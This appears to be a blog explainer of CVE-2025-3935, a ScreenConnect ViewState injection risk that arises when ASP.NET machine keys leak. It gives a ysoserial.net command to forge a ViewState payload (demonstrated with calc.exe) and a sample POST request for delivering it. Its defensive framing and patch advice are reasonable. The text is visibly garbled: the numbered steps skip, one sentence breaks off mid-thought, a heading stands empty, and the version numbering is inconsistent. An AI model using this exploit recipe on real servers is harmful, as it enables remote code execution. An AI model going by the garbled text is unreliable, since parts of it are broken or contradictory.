CVE-2025-3935 - ScreenConnect ViewState Injection Vulnerability Explained

ScreenConnect, a popular remote support tool, faces a new security buzz with the identification of CVE-2025-3935. This technical post unpacks what this vulnerability really means, why administrators should care, and how attackers could exploit it if machine keys get leaked. We’ll stick to clear terms, sample code, and step-by-step details you won’t find in the standard advisories. Let’s get started.

What is CVE-2025-3935?

CVE-2025-3935 refers to a security concern in ScreenConnect versions 25.2.3 and earlier. The issue is tied directly to the ASP.NET ViewState mechanism, which is used by web forms to store information about the web page and controls between requests.

Why ViewState Matters

ViewState is a hidden field sent in HTTP POST requests in ASP.NET apps. It lets the page "remember" data (like button states or values) between server hits. To protect this data, ViewState is encoded using Base64 and cryptographically signed with a secret known as the *machine key*.

But here’s the catch:
If an attacker gets access to the machine keys, they can forge ViewState data and maybe run code of their choice on the server.

How Does the Exploit Work?

Important:
This vulnerability isn’t caused by insecure coding in ScreenConnect itself. The real risk is in the platform (ASP.NET) and the way it handles ViewState. Still, if you run ScreenConnect ≤ 25.2.3 on top of Windows and someone nabs your machine keys, you’re at risk.

**Attacker dumps ASP.NET machineKey values** from the server.

3. Using these keys, attacker forges a malicious ViewState payload that runs commands or adds files when posted to the ScreenConnect web interface.

Proof-of-Concept: Malicious ViewState

Let’s use the popular ysoserial.net tool to forge a ViewState that echoes calc.exe (calculator) on the server. Assume we have the required machineKey:

ysoserial.exe -g ViewState -f LosFormatter -c "calc.exe" --path="/ScreenConnect.aspx" --viewstateKey="A3C2..." --validationKey="F9E2..."

This command spits out a base64 payload. To exploit

POST /ScreenConnect.aspx HTTP/1.1
Host: vulnerable.example.com
Content-Type: application/x-www-form-urlencoded

__VIEWSTATE=dDwtMTg3MTgxOTg5Ozt...

> Warning: This is for educational and defensive purposes—don’t try this attack on systems you do not own.

Installations where machine keys are still secret

ScreenConnect’s own security advisory makes it clear the bug is in how ASP.NET processes ViewState, not ScreenConnect per se.

How to Fix & Prevent

ScreenConnect fixed this by completely removing ViewState dependency and disabling it in v2025.4. Upgrade now!

Original references for further reading

- ScreenConnect Security Advisory
- OWASP: ViewState Security
- ysoserial.net tool

Conclusion

CVE-2025-3935 doesn’t reflect a coding bug in ScreenConnect, but it’s a reminder: Server secrets are gold! Guard your machine keys. Restrict privileged access. And always patch to the latest release, especially with web applications that face the open internet.

Timeline

Published on: 04/25/2025 19:15:49 UTC